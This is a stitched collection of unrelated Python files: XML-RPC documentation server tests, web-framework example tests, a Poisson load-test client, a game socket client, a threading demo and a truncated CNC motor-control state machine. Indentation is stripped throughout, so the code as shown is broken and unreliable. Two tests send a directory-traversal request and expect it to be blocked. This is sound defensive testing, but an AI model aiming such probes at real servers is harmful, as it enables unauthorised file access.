threads.append(t)
# direct()
curses.wrapper(main)
|
test_docxmlrpc.py
|
from xmlrpc.server import DocXMLRPCServer
import http.client
import sys
import threading
import unittest
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
self.client.request("GET", "/")
self.client.getresponse()
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
def make_server():
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"This is an XML-RPC server's documentation, but the server "
"can be used by POSTing to /RPC2. Try self.add, too.")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
def annotation(x: int):
""" Use function annotations. """
return x
class ClassWithAnnotation:
def method_annotation(self, x: bytes):
return x.decode()
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
serv.register_function(annotation)
serv.register_instance(ClassWithAnnotation())
return serv
except:
serv.server_close()
raise
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.serv = make_server()
self.thread = threading.Thread(target=self.serv.serve_forever)
self.thread.start()
PORT = self.serv.server_address[1]
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
self.serv.shutdown()
self.thread.join()
self.serv.server_close()
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server raises an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn((b'<dl><dt><a name="-<lambda>"><strong>'
b'<lambda></strong></a>(x, y)</dt></dl>'),
response.read())
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to
PEPS and RFCs with links, and that it linkifies text starting with
http or ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd>'
b'<tt>Add two instances together. This '
b'follows <a href="http://www.python.org/dev/peps/pep-0008/">'
b'PEP008</a>, but has nothing<br>\nto do '
b'with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">'
b'RFC1952</a>. Case should matter: pEp008 '
b'and rFC1952. Things<br>\nthat start '
b'with http and ftp should be '
b'auto-linked, too:<br>\n<a href="http://google.com">'
b'http://google.com</a>.</tt></dd></dl>'), response)
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_system_methods(self):
"""Test the presence of three consecutive system.* methods.
This also tests their use of parameter type recognition and the
systems related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp'
b'</strong></a>(method_name)</dt><dd><tt><a href="#-system.method'
b'Help">system.methodHelp</a>(\'add\') => "Adds '
b'two integers together"<br>\n <br>\nReturns a'
b' string containing documentation for '
b'the specified method.</tt></dd></dl>\n<dl><dt><a name'
b'="-system.methodSignature"><strong>system.methodSignature</strong>'
b'</a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">'
b'system.methodSignature</a>(\'add\') => [double, '
b'int, int]<br>\n <br>\nReturns a list '
b'describing the signature of the method.'
b' In the<br>\nabove example, the add '
b'method takes two integers as arguments'
b'<br>\nand returns a double result.<br>\n '
b'<br>\nThis server does NOT support system'
b'.methodSignature.</tt></dd></dl>'), response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn(b"""Try self.<strong>add</strong>, too.""",
response.read())
def test_annotations(self):
""" Test that annotations works as expected """
self.client.request("GET", "/")
response = self.client.getresponse()
docstring = (b'' if sys.flags.optimize >= 2 else
b'<dd><tt>Use function annotations.</tt></dd>')
self.assertIn(
(b'<dl><dt><a name="-annotation"><strong>annotation</strong></a>'
b'(x: int)</dt>' + docstring + b'</dl>\n'
b'<dl><dt><a name="-method_annotation"><strong>'
b'method_annotation</strong></a>(x: bytes)</dt></dl>'),
response.read())
if __name__ == '__main__':
unittest.main()
|
test_examples.py
|
# The MIT License (MIT)
#
# Copyright (c) 2014-2017 Susam Pal
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Tests to verify examples in README.rst."""
import unittest
import urllib.request
import urllib.error
import urllib.parse
import threading
import time
import ice
from test import data
class ExamplesTest(unittest.TestCase):
def setUp(self):
self.app = ice.cube()
def tearDown(self):
self.app.exit()
def run_app(self):
threading.Thread(target=self.app.run).start()
while not self.app.running():
time.sleep(0.1)
def assert200(self, path, *snippets):
r = urllib.request.urlopen('http://localhost:8080' + path)
response = r.read()
for snippet in snippets:
self.assertIn(snippet.encode(), response)
def assert404(self, path):
with self.assertRaises(urllib.error.HTTPError) as cm:
r = urllib.request.urlopen('http://localhost:8080' + path)
self.assertEqual(cm.exception.code, 404)
self.assertIn(b'<h1>404 Not Found</h1>', cm.exception.read())
def test_getting_started_example(self):
self.run_app()
self.assert200('/', '<h1>It works!</h1>')
self.assert404('/foo')
def test_literal_route_example(self):
app = self.app
# Example
@app.get('/')
def home():
return ('<!DOCTYPE html>'
'<html><head><title>Home</title></head>'
'<body><p>Home</p></body></html>')
@app.get('/foo')
def foo():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>Foo</p></body></html>')
# Test
self.run_app()
self.assert200('/', '<p>Home</p>')
self.assert200('/foo', '<p>Foo</p>')
self.assert404('/foo/')
self.assert404('/bar')
def test_anonymous_wildcard_example(self):
app = self.app
# Example
@app.get('/<>')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>' + a + '</title></head>'
'<body><p>' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/foo', '<p>foo</p>')
self.assert200('/bar', '<p>bar</p>')
self.assert404('/foo/')
self.assert404('/foo/bar')
def test_named_wildcard_example1(self):
app = self.app
# Example
@app.get('/<a>')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>' + a + '</title></head>'
'<body><p>' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/foo', '<p>foo</p>')
self.assert200('/bar', '<p>bar</p>')
self.assert404('/foo/')
self.assert404('/foo/bar')
def test_named_wildcard_example2(self):
app = self.app
# Example
@app.get('/foo/<>-<>/<a>-<b>/<>-<c>')
def foo(*args, **kwargs):
return ('<!DOCTYPE html> '
'<html><head><title>Example</title></head><body> '
'<p>args: {}<br>kwargs: {}</p> '
'</body></html>').format(args, kwargs)
# Test
self.run_app()
self.assert200('/foo/hello-world/ice-cube/wsgi-rocks',
"args: ('hello', 'world', 'wsgi')",
"'a': 'ice'", "'b': 'cube'", "'c': 'rocks'")
def test_named_wildcard_example3(self):
app = self.app
# Example
@app.get('/<user>/<category>/<>')
def page(page_id, user, category):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body> '
'<p>page_id: {}<br>user: {}<br>category: {}</p> '
'</body></html>').format(page_id, user, category)
# Test
self.run_app()
self.assert200('/snowman/articles/python',
'<p>page_id: python<br>user: snowman<br>'
'category: articles</p>')
def test_throwaway_wildcard_example1(self):
app = self.app
# Example
@app.get('/<!>')
def foo(*args, **kwargs):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>args: {}<br>kwargs: {}</p>'
'</body></html>').format(args, kwargs)
# Test
self.run_app()
self.assert200('/foo', '<p>args: ()<br>kwargs: {}</p>')
def test_throwaway_wildcard_example2(self):
app = self.app
# Example
@app.get('/<!>/<!>/<>')
def page(page_id):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>page_id: ' + page_id + '</p>'
'</body></html>')
# Test
self.run_app()
self.assert200('/snowman/articles/python',
'<p>page_id: python</p>')
def test_wildcard_specification_example(self):
app = self.app
# Example
@app.get('/notes/<:path>/<:int>')
def note(note_path, note_id):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>note_path: {}<br>note_id: {}</p>'
'</body></html>').format(note_path, note_id)
# Test
self.run_app()
self.assert200('/notes/tech/python/12',
'<p>note_path: tech/python<br>note_id: 12</p>')
self.assert200('/notes/tech/python/0',
'<p>note_path: tech/python<br>note_id: 0</p>')
self.assert404('/notes/tech/python/+12')
self.assert404('/notes/tech/python/+0')
self.assert404('/notes/tech/python/012')
def test_regex_route_example1(self):
app = self.app
# Example
@app.get('/(.*)')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>' + a + '</title></head>'
'<body><p>' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/foo', '<p>foo</p>')
self.assert200('/foo/bar/', '<p>foo/bar/</p>')
def test_regex_route_example2(self):
app = self.app
# Example
@app.get('/(?P<user>[^/]*)/(?P<category>[^/]*)/([^/]*)')
def page(page_id, user, category):
return ('<!DOCTYPE html>'
'<html><head><title>Example</title></head><body>'
'<p>page_id: {}<br>user: {}<br>category: {}</p>'
'</body></html>').format(page_id, user, category)
# Test
self.run_app()
self.assert200('/snowman/articles/python',
'<p>page_id: python<br>user: snowman<br>'
'category: articles</p>')
def test_explicit_literal_route_example(self):
app = self.app
# Example
@app.get('literal:/<foo>')
def foo():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>Foo</p></body></html>')
# Test
self.run_app()
self.assert200('/<foo>', '<p>Foo</p>')
self.assert404('/foo')
def test_explicit_wildcard_route_example(self):
# Example
app = self.app
@app.get('wildcard:/(foo)/<>')
def foo(a):
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>a: ' + a + '</p></body></html>')
# Test
self.run_app()
self.assert200('/(foo)/bar', '<p>a: bar</p>')
self.assert404('/foo/<>')
def test_explicit_regex_route_example(self):
app = self.app
# Example
        @app.get(r'regex:/foo\d*$')
def foo():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>Foo</p></body></html>')
# Test
self.run_app()
self.assert200('/foo123', '<p>Foo</p>')
self.assert200('/foo', '<p>Foo</p>')
        self.assert404(r'/foo\d*$')
def test_query_string_example1(self):
app = self.app
# Example
@app.get('/')
def home():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>name: {}</p></body>'
'</html>').format(app.request.query['name'])
# Test
self.run_app()
self.assert200('/?name=Humpty+Dumpty',
'<p>name: Humpty Dumpty</p>')
def test_query_string_example2(self):
app = self.app
# Example
@app.get('/')
def home():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><p>name: {}</p></body>'
'</html>').format(app.request.query.getall('name'))
# Test
self.run_app()
self.assert200('/?name=Humpty&name=Santa',
"<p>name: ['Humpty', 'Santa']</p>")
def test_form_example1(self):
app = self.app
# Example
@app.get('/')
def show_form():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><form action="/result" method="post">'
'First name: <input name="firstName"><br>'
'Last name: <input name="lastName"><br>'
'<input type="submit">'
'</form></body></html>')
@app.post('/result')
def show_post():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head><body>'
'<p>First name: {}<br>Last name: {}</p>'
'</body></html>').format(app.request.form['firstName'],
app.request.form['lastName'])
# Test
self.run_app()
self.assert200('/', 'First name')
form = {'firstName': 'Humpty', 'lastName': 'Dumpty'}
data = urllib.parse.urlencode(form).encode()
response = urllib.request.urlopen(
'http://localhost:8080/result', data)
self.assertIn(b'<p>First name: Humpty<br>Last name: Dumpty</p>',
response.read() )
def test_form_example2(self):
app = self.app
# Example
@app.get('/')
def show_form():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head>'
'<body><form action="/result" method="post">'
'name1: <input name="name"><br>'
'name2: <input name="name"><br>'
'<input type="submit">'
'</form></body></html>')
@app.post('/result')
def show_post():
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head><body>'
'<p>name (single): {}<br>name (multi): {}</p>'
'</body></html>').format(app.request.form['name'],
app.request.form.getall('name'))
# Test
self.run_app()
self.assert200('/', 'name1')
form = (('name', 'Humpty'), ('name', 'Santa'))
data = urllib.parse.urlencode(form).encode()
response = urllib.request.urlopen(
'http://localhost:8080/result', data)
self.assertIn(b'<p>name (single): Santa<br>'
b"name (multi): ['Humpty', 'Santa']</p>",
response.read() )
def test_cookie_example(self):
app = self.app
@app.get('/')
def show_count():
count = int(app.request.cookies.get('count', 0)) + 1
app.response.set_cookie('count', str(count))
return ('<!DOCTYPE html>'
'<html><head><title>Foo</title></head><body>'
'<p>Count: {}</p></body></html>'.format(count))
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/')
self.assertEqual(response.getheader('Set-Cookie'), 'count=1')
self.assertIn(b'<p>Count: 1</p>', response.read())
response = urllib.request.urlopen(
urllib.request.Request('http://localhost:8080/',
headers={'Cookie': 'count=1'}))
self.assertEqual(response.getheader('Set-Cookie'), 'count=2')
self.assertIn(b'<p>Count: 2</p>', response.read())
def test_error_example(self):
app = self.app
# Example
@app.error(404)
def error():
return ('<!DOCTYPE html>'
'<html><head><title>Page not found</title></head>'
'<body><p>Page not found</p></body></html>')
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 404)
self.assertIn(b'<p>Page not found</p>', cm.exception.read())
# Set status code and return body
def test_status_codes_example1(self):
app = self.app
# Example
@app.get('/foo')
def foo():
app.response.status = 403
return ('<!DOCTYPE html>'
'<html><head><title>Access is forbidden</title></head>'
'<body><p>Access is forbidden</p></body></html>')
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<p>Access is forbidden</p>', cm.exception.read())
# Set body and return status code (not recommended)
def test_status_code_example2(self):
app = self.app
# Example
@app.get('/foo')
def foo():
app.response.body = ('<!DOCTYPE html>'
'<html><head><title>Access is forbidden</title></head>'
'<body><p>Access is forbidden</p></body></html>')
return 403
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<p>Access is forbidden</p>', cm.exception.read())
# Set status code and error handler (recommended)
def test_status_code_example3(self):
app = self.app
# Example
@app.get('/foo')
def foo():
return 403
@app.error(403)
def error403():
return ('<!DOCTYPE html>'
'<html><head><title>Access is forbidden</title></head>'
'<body><p>Access is forbidden</p></body></html>')
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<p>Access is forbidden</p>', cm.exception.read())
# Set return code only (generic error handler is invoked)
def test_status_code_example4(self):
app = self.app
# Example
@app.get('/foo')
def foo():
return 403
# Test
self.run_app()
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(cm.exception.code, 403)
self.assertIn(b'<h1>403 Forbidden</h1>\n<p>Request forbidden '
b'-- authorization will not help</p>\n',
cm.exception.read())
def test_redirect_example1(self):
app = self.app
@app.get('/foo')
def foo():
return 303, '/bar'
@app.get('/bar')
def bar():
return ('<!DOCTYPE html>'
'<html><head><title>Bar</title></head>'
'<body><p>Bar</p></body></html>')
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo')
self.assertIn(b'<p>Bar</p>', response.read())
def test_redirect_example2(self):
app = self.app
@app.get('/foo')
def foo():
app.response.add_header('Location', '/bar')
return 303
@app.get('/bar')
def bar():
return ('<!DOCTYPE html>'
'<html><head><title>Bar</title></head>'
'<body><p>Bar</p></body></html>')
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo')
self.assertIn(b'<p>Bar</p>', response.read())
# Static file with media type guessing
def test_static_file_example1(self):
app = self.app
# Example
@app.get('/code/<:path>')
def send_code(path):
return app.static(data.dirpath, path)
# Test regular request
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/code/foo.txt')
self.assertEqual(response.read(), b'foo\n')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
# Test directory traversal attack
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/code/%2e%2e/foo.txt')
self.assertEqual(cm.exception.code, 403)
# Static file with explicit media type
def test_static_file_example2(self):
app = self.app
# Example
@app.get('/code/<:path>')
def send_code(path):
return app.static(data.dirpath, path,
media_type='text/plain', charset='ISO-8859-1')
# Test regular request
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/code/foo.c')
self.assertEqual(b'#include <stdio.h>\n\n'
b'int main()\n{\n'
b' printf("hello, world\\n");\n'
b' return 0;\n'
b'}\n', response.read())
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=ISO-8859-1')
# Test directory traversal attack
with self.assertRaises(urllib.error.HTTPError) as cm:
urllib.request.urlopen('http://localhost:8080/code/%2e%2e/foo.txt')
self.assertEqual(cm.exception.code, 403)
def test_download_example1(self):
app = self.app
# Example
@app.get('/foo')
def foo():
return app.download('hello, world', 'foo.txt')
@app.get('/bar')
def bar():
return app.download('hello, world', 'bar',
media_type='text/plain', charset='ISO-8859-1')
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="foo.txt"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
self.assertEqual(b'hello, world', response.read())
response = urllib.request.urlopen('http://localhost:8080/bar')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="bar"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=ISO-8859-1')
self.assertEqual(b'hello, world', response.read())
def test_download_example2(self):
app = self.app
# Example
@app.get('/code/<:path>')
def send_download(path):
return app.download(app.static(data.dirpath, path))
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/code/foo.txt')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="foo.txt"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
self.assertEqual(b'foo\n', response.read())
def test_download_example3(self):
app = self.app
# Example
@app.get('/<!:path>')
def send_download():
return app.download('hello, world')
# Test
self.run_app()
response = urllib.request.urlopen('http://localhost:8080/foo.txt')
self.assertEqual(response.getheader('Content-Disposition'),
'attachment; filename="foo.txt"')
self.assertEqual(response.getheader('Content-Type'),
'text/plain; charset=UTF-8')
self.assertEqual(b'hello, world', response.read())
with self.assertRaises(urllib.error.HTTPError) as cm:
r = urllib.request.urlopen('http://localhost:8080/foo/')
self.assertEqual(cm.exception.code, 500)
def test_environ(self):
app = self.app
# Example
@app.get('/')
def foo():
user_agent = app.request.environ.get('HTTP_USER_AGENT', None)
return ('<!DOCTYPE html>'
'<html><head><title>User Agent</title></head>'
'<body><p>{}</p></body></html>'.format(user_agent))
# Test
self.run_app()
self.assert200('/', 'Python-urllib')
|
background_client.py
|
import argparse
import base64
import concurrent.futures
import json
from multiprocessing import Process
import numpy as np
import os
import queue
import random
import requests
import socket
import struct
from threading import Thread
import time
from clipper_admin.docker.common import *
img_data = []
ip_addr = None
q = queue.Queue()
stop_feeding = False
def request(idx):
global img_data, ip_addr
start = time.time()
url = "http://{}:1337/bg/predict".format(ip_addr)
print(url)
req_json = json.dumps({
"input": img_data[idx]
})
headers = {'Content-type': 'application/json'}
r = requests.post(url, headers=headers, data=req_json)
end = time.time()
print(end - start)
return (end - start)
# Modified from https://stackoverflow.com/questions/16914665/how-to-use-queue-with-concurrent-future-threadpoolexecutor-in-python-2
def prepare_queries(query_info):
global stop_feeding
while True:
for query in query_info:
time.sleep(query[0])
q.put(query[1])
if stop_feeding:
print("Returning from prepare_queries", flush=True)
return "DONE FEEDING"
return "DONE FEEDING"
def poisson_individual_requests(args, num_imgs):
global img_data
global stop_feeding
total_num_queries = 100000
queries = []
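    # Draw exponentially distributed inter-arrival gaps so that request arrivals
    # approximate a Poisson process averaging args.rate queries per second.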
sleep_times = np.random.exponential(1./args.rate, total_num_queries)
#sleep_times = [1. / args.rate] * total_num_queries
send_times = [sleep_times[0]]
for i in range(1, len(sleep_times)):
send_times.append(sleep_times[i] + send_times[i-1])
for i in range(total_num_queries):
queries.append((send_times[i], random.randrange(num_imgs)))
    max_num_outstanding = 30  # other candidate values: args.rate, 10*args.rate, 100
with concurrent.futures.ThreadPoolExecutor(max_workers=max_num_outstanding) as executor:
while not stop_feeding:
reqs = []
start = time.time()
for st, idx in queries:
progress = time.time() - start
if progress < st:
time.sleep(st - progress)
reqs.append(executor.submit(request, idx))
if stop_feeding:
break
print("Exiting main loop", flush=True)
end = time.time()
return (end-start)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--frontend_ip", type=str, help="IP address of frontend")
parser.add_argument("--port", type=int, help="Port to listen on")
parser.add_argument("--img_dir", type=str, help="Path to directory containing images")
parser.add_argument("--num_imgs", type=int, help="Number of images that can be queried")
parser.add_argument("--rate", type=int, help="Average # queries to send per second. Used for generating a Poisson process.")
args = parser.parse_args()
print(args)
assert os.path.isdir(args.img_dir)
ip_addr = args.frontend_ip
imgs = [os.path.join(args.img_dir, im) for im in os.listdir(args.img_dir) if "jpg" in im]
num_imgs = min(args.num_imgs, len(imgs))
imgs = imgs[:num_imgs]
for img in imgs:
with open(img, 'rb') as infile:
img_data.append(base64.b64encode(infile.read()).decode())
ip = "0.0.0.0"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((ip, args.port))
sock.listen(5)
(clientsocket, addr) = sock.accept()
print("addr is", addr)
data = clientsocket.recv(msg_packer.size)
msg = msg_packer.unpack(data)[0]
clientsocket.send(msg_packer.pack(*(msg,)))
clientsocket.close()
assert msg == MSG_START, "Unexpected msg at start '{}'".format(msg)
# elapsed_time = poisson_individual_requests(args, num_imgs)
req_thread = Thread(target=poisson_individual_requests, args=(args, num_imgs))
req_thread.start()
print("Listening for another connection", flush=True)
(clientsocket, addr) = sock.accept()
data = clientsocket.recv(msg_packer.size)
msg = msg_packer.unpack(data)[0]
assert msg == MSG_STOP, "Unexpected msg at stop '{}'".format(msg)
print("Setting stop_feeding to true", flush=True)
stop_feeding = True
print("Waiting for thread to join", flush=True)
req_thread.join()
print("Thread joined", flush=True)
clientsocket.send(msg_packer.pack(*(msg,)))
clientsocket.close()
sock.close()
print("done")
|
client.py
|
import socket
import threading
import util
import main
host, port = '127.0.0.1', 10000
players = None
owned_player = None
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
def mainloop():
while True:
data = sock.recv(1024)
if not data:
break
data_buffer = util.DataBuffer(data)
while len(data_buffer.remaining):
handle_packet(data_buffer.readByte(), data_buffer)
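# Packet layouts, as implied by the reads below:
#   PACKET_SPAWN:           sbyte player_id, byte owned, short x, short y
#   PACKET_DESPAWN:         sbyte player_id
#   PACKET_POSITION_UPDATE: sbyte player_id, short x, short y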
def handle_packet(packet_id, data_buffer):
if packet_id == util.PACKET_SPAWN:
try:
player_id = data_buffer.readSByte()
owned = data_buffer.readByte()
x = data_buffer.readShort()
y = data_buffer.readShort()
# clear the buffer
data_buffer.clear()
except:
return
if owned:
# create a new player instance as an owned object
player = main.Player(player_id, True)
#player_group.add(player)
#player_group.center(player.rect.center)
else:
player = main.Player(player_id, False)
player.x = x
player.y = y
players[player_id] = player
elif packet_id == util.PACKET_DESPAWN:
try:
player_id = data_buffer.readSByte()
# clear the buffer
data_buffer.clear()
except:
return
if player_id not in players:
return
del players[player_id]
elif packet_id == util.PACKET_POSITION_UPDATE:
try:
player_id = data_buffer.readSByte()
x = data_buffer.readShort()
y = data_buffer.readShort()
# clear the buffer
data_buffer.clear()
except:
return
if player_id not in players:
return
player = players[player_id]
player.x = x
player.y = y
def handle_send_request_spawn():
data_buffer = util.DataBuffer()
data_buffer.writeByte(util.PACKET_REQUEST_SPAWN)
sock.send(data_buffer.data)
def handle_send_position_update(player):
data_buffer = util.DataBuffer()
data_buffer.writeByte(util.PACKET_POSITION_UPDATE)
data_buffer.writeSByte(player.id)
data_buffer.writeShort(player.x)
data_buffer.writeShort(player.y)
sock.send(data_buffer.data)
def run_mainloop():
t = threading.Thread(target=mainloop)
t.daemon = True
t.start()
|
thread_01.py
|
import threading
def first_fun(age):
while True:
print('I am first child.', age)
pass
return
def second_fun(age):
while True:
print('I am second child.', age)
pass
return
if __name__== "__main__":
first = threading.Thread(target=first_fun , args = (5,))
second = threading.Thread(target=second_fun, args = (3,))
first.start()
second.start()
    first.join()  # We made the call, so we have to answer it.
second.join()
while True:
print('I am child.')
pass
|
run_pinc.py
|
from serial_host import packet_definitions as pkt
from serial_host import cold_start, read, write
from kinematics import corexy_inverse, corexy_transform, z0, z1, z2, center_home
from marker_tracking import get_laser_displacement, run_tracking_loop, get_error, end_tracking_loop, enable_fiducial_sensing, enable_laser_sensing
from threading import Thread
import numpy as np
from time import time, sleep
from queue import Queue
import os
from xbox360controller import Xbox360Controller
from gcode_solver import GcodeSolver
from pinc_state import State
import sys
import logging
CONTROLLER_DEAD_ZONE = 0.2
CONTROLLER_JOG_RATE = 100
MAX_ACCELERATION = 1000
XY_MM_PER_RAD = 6.36619783227
Z_MM_PER_RAD = 0.795774715
HOMING_SPEED = 10
# ------ Debug Variables --------
errorx = 0
errory = 0
# -------------------------------
embedded_motors = {}
embedded_sensors = {}
jog_controller = None
with open('box_gcode.gcode', 'r') as f:
gcode = f.read()
path_planner = GcodeSolver(gcode)
state = None
event_queue = Queue()
def post_event(event):
event_queue.put(event)
def handle_events():
global state
if not event_queue.empty():
event = event_queue.get()
logging.info(event)
state = state.on_event(event)
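# States post string events onto event_queue; handle_events() pops at most one
# event per control cycle and asks the current state for its successor via
# state.on_event(event). Each state fills self.event_map in __init__, which
# presumably drives that lookup inside pinc_state.State.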
class InitState(State):
def __init__(self):
super().__init__()
self.event_map['init'] = HomeState
# self.event_map['init'] = ManualState
def run(self):
post_event('init')
class JogState(State):
def __init__(self):
super().__init__()
self.xstart, self.ystart = corexy_inverse(embedded_motors[3].theta - FineHomeState.home_3, embedded_motors[4].theta- FineHomeState.home_4)
self.jog_time = 10
self.start_time = time()
self.x_target, self.y_target = 0, 0
self.xw_nominal, self.yw_nominal = 0, 0
def set_jog_target(self, x, y, time):
self.jog_time = time
self.x_target, self.y_target = x, y
self.xw_nominal = (self.x_target - self.xstart)/self.jog_time
self.yw_nominal = (self.y_target - self.ystart)/self.jog_time
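    # run() advances a nominal position linearly from (xstart, ystart) towards
    # (x_target, y_target) over jog_time seconds; the speed command is the
    # position error plus the nominal feed velocity (xw_nominal, yw_nominal),
    # mapped to motors 3 and 4 by the CoreXY transform. Once the interpolation
    # completes it builds zero-speed commands and posts 'jog done'.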
def run(self):
self.xpos, self.ypos = corexy_inverse(embedded_motors[3].theta - FineHomeState.home_3, embedded_motors[4].theta- FineHomeState.home_4)
self.xvel, self.yvel = corexy_inverse(embedded_motors[3].omega, embedded_motors[4].omega)
interp = (time()-self.start_time)/self.jog_time
if interp >= 1:
control_packet = pkt.pack_HeaderPacket(
command=pkt.SerialCommand.RUN_MOTOR, motorCount=2)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[3].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
control_packet += pkt.pack_MotorCommandPacket(
embedded_motors[4].motorId, pkt.MotorCommand.SET_OMEGA, control=0)
post_event('jog done')
else:
x_nominal = interp*(self.x_target - self.xstart) + self.xstart
y_nominal = interp*(self.y_target - self.ystart) + self.ystart
x_error = x_nominal - self.xpos
y_error = y_nominal - self.ypos
control_x = x_error + self.xw_nominal
control_y = y_error + self.yw_nominal
control_3, control_4 = corexy_transform(control_x, control_y)
